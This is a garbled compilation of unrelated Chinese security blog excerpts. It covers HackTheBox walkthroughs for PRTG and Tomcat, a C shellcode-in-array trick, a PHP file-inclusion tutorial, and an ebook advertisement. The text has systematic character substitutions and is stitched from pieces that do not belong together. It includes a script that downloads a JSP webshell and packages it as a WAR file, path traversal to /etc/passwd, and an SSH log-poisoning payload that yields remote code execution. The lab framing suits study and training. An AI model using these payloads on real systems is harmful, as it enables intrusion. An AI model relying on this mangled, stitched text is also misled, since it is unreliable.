首先nmap，发现FTP可匿名登陆，80端口是一个叫PRTG的监控网页，有SMB服务 用anonymous/空明码登陆FTP依据官网文档，尝试找PRTG配置文件是否有敏感信息最终确定在\ProgramData\Paessler\PRTG Network Monitor 下载configuration文件找到用户名明码登陆网页然而失败。最终把2018改为2019登陆胜利 依据版本号搜到可利用的CVE-2018-9276 先到这

easy box. 首先nmap开路： 找到8080端口： Tomcat字典：https://raw.githubusercontent...找到弱口令tomcat:s3cret 部署war包：办法1：官网walkthrough上的： #!/bin/shwget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jspmkdir wshellcp index.jsp wshell/cd wshelljar -cvf ../wshell.war 部署wshell:门路比拟深拿到flag 办法2：msf应用multi/http/tomcat_mgr_upload 办法3： msfvenom生成war包上传war包后nc:

神秘代码大家好 我是周杰伦 明天给大家看个有意思的货色！ 不仅有意思，还能学到常识。 话题从两行（精确的说是一行）神奇的代码聊起： #include <stdio.h>int main[] = { 232,-1065134080,26643,12517440,4278206464,12802064,(int)printf };这是一段C++代码，猜猜看编译运行后，会输入什么？ 可能，你会问：这TM连main函数都没有，能编译胜利？ 还真能！ 咱们别离在Windows平台下的Visual Studio和Linux平台下的 g++ 进行编译，而后别离执行看看成果： Windows下： Linux下： 不仅能编译胜利，还能失常运行，在Windows上输入了一个MZ，在Linux上输入了一个ELF。 相熟PE文件格式的同学可能晓得，MZ是PE文件结尾的标记，另外，ELF也是Linux上的可执行文件结尾的标记。 也就是说：下面这行代码执行后，把所在可执行文件头部的字符串给打印进去了！ 反汇编假相看到这里，你可能有两个问题： 为什么没有main函数还能通过编译？为什么会输入这么一串信息？对于第一个问题，置信大家应该也猜到了个八九不离十。尽管代码中没有main函数，然而有一个main数组啊！会不会跟它有关系？ 是的没错，对于编译器而言，函数也好，变量也好，最终都解决成了一个个的符号Symbol，而编译器并没有辨别这个符号是来自一个函数还是一个数组。所以，咱们用一个main数组，骗过了编译器。 也就是说：编译器把main数组当成了main函数，把main数组中的数据当成了main函数的函数体指令。 而要答复第二个问题，那就得看下这个main数组中的这一段奇怪的数字，到底是一段什么样的代码？ 将main数组中的数值转换成16进制看看，依照一个int变量占4个字节对齐： 再进一步，应用反汇编引擎看看这段16进制数据是什么指令？ 接下来，咱们逐条剖析这些指令。 call $+5 这是一条十分重要的指令，请记住：call指令是在执行函数调用，执行call指令的时候，会将下一条指令的地址压入线程的栈顶，用于函数返回时取出找到回去的路，那下一条是谁？就是上面的pop eax这条指令，所以执行这个call指令时，会把上面那个pop eax指令的地址压入栈顶。 再者，call前面的指标地址是$+5，也就是这条call指令地址+5个字节的中央，同样是上面那条pop eax指令的地址，所以call的指标函数就是紧接着的上面pop eax指令开始的中央。 那这么吃力执行这个call $+5的意义何在？其实就是为了获取以后这段代码所在的内存空间地址，然而又没有方法间接读取指令寄存器EIP的值，所以借助一个call，把这段代码的地址压入到堆栈中，随后再取出来就能晓得这段代码被搁置在内存中哪个地址在执行了。 这个手法，是黑客编写shellcode的习用手腕。 pop eax 留神，执行到这里的时候，线程的栈顶寄存的就是这条指令所在的地位，是下面那条call指令导致的后果。 接着，pop eax，将栈顶寄存的这个地址取出来，放到eax寄存器中。当初eax中寄存的就是以后指令的内存地址了。 add eax, 13h 下面费这么大劲拿到了这个地址有什么用呢？别急，看这条指令，给它加了13h，也就是十进制的19，回头看看main数组那个十六进制字节表，加了19后，正好是main数组最初一个元素所在的地位——外面寄存了printf函数的地址。 所以，截止到这里，后面这三条指令的目标就是为了能拿到printf函数的地址。 push 400000h↵↵拿到printf函数当前，开始调用。这里给printf传了一个参数：0x00400000，也就是要打印的字符串地址。 mov edi, 400000h↵↵这里同样是在给printf函数传参，这里和下面那条，一个通过堆栈传参，一个通过寄存器传参数，是为了同时兼容Windows平台和Linux x64平台上的函数调用约定。 而之所以传递的字符串地址是0x00400000，是因为刚好，这个数字是两个平台上可执行文件加载的默认基地址。 Windows： Linux： (gdb) x /16c 0x004000000x400000: 127 '\177' 69 'E' 76 'L' 70 'F' 2 '\002' 1 '\001' 1 '\001' 0 '\000'0x400008: 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000' 0 '\000'call dword ptr [eax] ...

当初开始HTB打靶之路，做一些记录。 首先NMAP开路解释一下：nmap -sC 依据端口辨认服务主动调用默认脚本nmap --script好了开始 其中值得关注的有445 SMB服务，1433 MSSQL先看看SMB，Linux可应用SMBclient拜访windows零碎公布的共享资源尝试匿名拜访匿名拜访胜利配置文件找到明码 先写到这

1.1.本地复现过后发现url中有一个参数file=/home/task.php，眉头一皱;计上心来，把/home/task.php替换成了../../../../../../etc/passwd接着发送带有php代码的申请，先phpinfo试一试。接着就是蕴含日志了，感觉马上就要腾飞了，后果很忽然，no such file了，又换了几个门路，还是这样。没方法只是试试蕴含一下配置文件，后果….一样。这可咋办，眼瞅着就要getshell了，没门路啊，忽然想到还有一个ssh log能够尝试蕴含一下，立即来了精力头，噼里啪啦一顿敲，食指放在回车键上，当机立断，豁出去了！只见我眼睛一闭，重重按下回车，当我缓缓睁开眼时，悲痛欲绝，终于没有no such file 了接下来就很简略了间接ssh连贯：ssh ‘<?=eval($_REQUEST[1])?>’@remotehost 蕴含ssh log文件，而后执行下命令：id。胜利！ 2.文件蕴含小常识2.1.蕴含函数1、PHP共有4个与文件蕴含相干的函数： include require include_once require_once 2、Include与include_once的区别： （1）Include：会将指定的文件载入并执行外面的程序；反复援用的状况下加载屡次。 例如： 这里include两次1.php文件，所以就会蕴含1.php两次。 （2）Include_once：会将指定的文件载入并执行外面的程序；此行为和include语句相似，惟一区别是如果该文件中曾经被蕴含过，则不会再次蕴含。 例如： 这里include_once了两次1.php文件，但只会蕴含1.php一次。 （3）require和requireonce的用处与下面两个一样，但区别就是require和requireonce会加载页面最开始执行。Include和include_once会按代码程序执行。 2.2.反对的协定和封装协定File:// ——拜访本地文件系统 http(s):// ——拜访HTTP（s）网址 ftp:// ——拜访FTP(s) URLs php:// ——拜访各个输出/输入流（I/O streams） zlib:// ——压缩流 data:// ——数据（RFC 2397） glob:// ——查找匹配的文件门路模式 phar:// ——PHP归档 ssh2:// ——Secure Shell 2 rar:// ——RAR ogg:// ——音频流 expect:// ——解决交互式的流 2.3.罕用伪协定解说： file://（1）这个协定能够展示本地文件系统，默认目录是以后的工作目录。 （2）例如：file:///etc/passwd、file://key.txt php://(1) php://input是个能够拜访申请的原始数据的只读流，能够拜访申请的原始数据的只读流，将post申请中的数据作为php代码执行。 (2) php://filter是一种元封装器，设计用于数据流关上时的筛选过滤利用。 3、phar:// （1）phar://数据流包装器自PHP5.3.0起开始无效 （2）例如：phar://E:/phpstudy/www/1.zip/phpinfo.txt phar://1.zip/phpinfo.txt 2.4.伪协定利用形式小总结: 3.getshell总结3.1.Getshell之session条件：session文件门路已知，且session文件中内容局部可控。 获取session文件门路： 1、session文件的保留门路能够在phpinfo的session.save_path看到。 2、默认门路： /var/lib/php/sess_PHPSESSID /var/lib/php/sess_PHPSESSID ...

大家好，我是冰河~~ 明天给小伙伴们公布一个重大音讯，没错，就是题目说的《冰河的浸透实战笔记》电子书正式面世了，这也是冰河公布的第9本开源电子书了。心急的小伙伴能够间接到文末见获取形式。 不心急的小伙伴就先听我介绍（吹一吹）这本《冰河的浸透实战笔记》电子书。 只管将笔记整顿成电子书花了我不到两天的工夫，然而笔记的内容却前前后后花了我3~4年的工夫。在这本电子书中，冰河精挑细选了一些根底浸透常识和实战内容，不偏实践，重实战，间接实操上手的实战案例，让零根底的小伙伴也能上手进行实战。 本书特点全网首个开源的以实战案例为背景的浸透实战笔记，全书共442页，共计37万字（不计空格）。 整本书的内容涵盖：Kali根底、浸透工具、木马制作、钓鱼链接生成、爆破明码、内存溢出攻打、web浸透、数据提权、社会工程学。 本书为冰河总结的浸透实战笔记，没有太多的哗众取巧的修辞手法和夸大的图片形容，有的仅仅是纯技术实战的干货笔记内容，通过精挑细选整顿而成的电子书，浏览本书时，须要小伙伴们静下心来，抛开杂念，急躁领会书中的每一项技术。只有这样，你能力更好的了解和把握书中波及的每项技术，能力更好的领会冰河在记录笔记和整顿电子书时的那份激情和心情。 写作本书的原因其实，很早就想写一本对于浸透方面的书籍，事实中却总是因为这样或者那样的起因被搁浅了。 平时我会在我的公众号（冰河技术，大家能够关注下）和博客里分享一些浸透相干的文章，不少小伙伴也在公众号后盾留言让我零碎整顿下。最近，我也在一些读者群里调研了下，大家对于浸透（网络攻防）这个话题很感兴趣。其实，除了这些，也有不少读者反馈说，一些培训网络安全课程的培训机构，一些集体写的免费专栏，很多间接搬运了我公开发表的浸透文章，这着实让人怄气。 为了可能让小伙伴们更加零碎的理解浸透技术，从而进步网络信息的安全意识，乃至为网络信息安全作出本人的一份奉献，冰河再忙也要把这本笔记整理出来分享给大家。 另外，信息安全始终都是互联网行业一个十分重要的话题，很多时候，不得不说，那些肆意毁坏网络环境的骇客们有着很强的技术能力。为了更好的保护网络环境的平安，咱们也不得不充沛理解那些骇客们的攻击方式，只有如此，咱们能力在此基础上找到更好的进攻计划和进攻伎俩。 本书以实战的形式列举了大量骇客们应用的攻击方式，绝大部分来自于冰河本身总结的成绩，少部分来源于互联网，并经冰河亲自验证整顿。 所以说，本书也有局部内容是站在前人的肩膀上实现的，在此，感激那些为了网络的平安默默付出的前辈们。 本书内容精选 如何获取本书？我曾经把电子书上传到CSDN啦，小伙伴们间接下载就好啦，下载链接如下所示。 https://download.csdn.net/download/l1028386804/18830348其余最初，从新统计下，购买了《海量数据处理与大数据技术实战》和《MySQL技术大全：开发、优化与运维实战》的小伙伴们私聊我，我从新拉你进专有技术交换群。 大家在浏览《冰河的浸透实战笔记》这本书的过程中，有任何问题都能够在文末留言或者加我微信：sun_shine_lyz私聊，我看到后都会为大家一一解答。好了，明天就到这儿吧，我是冰河，咱们下期见~~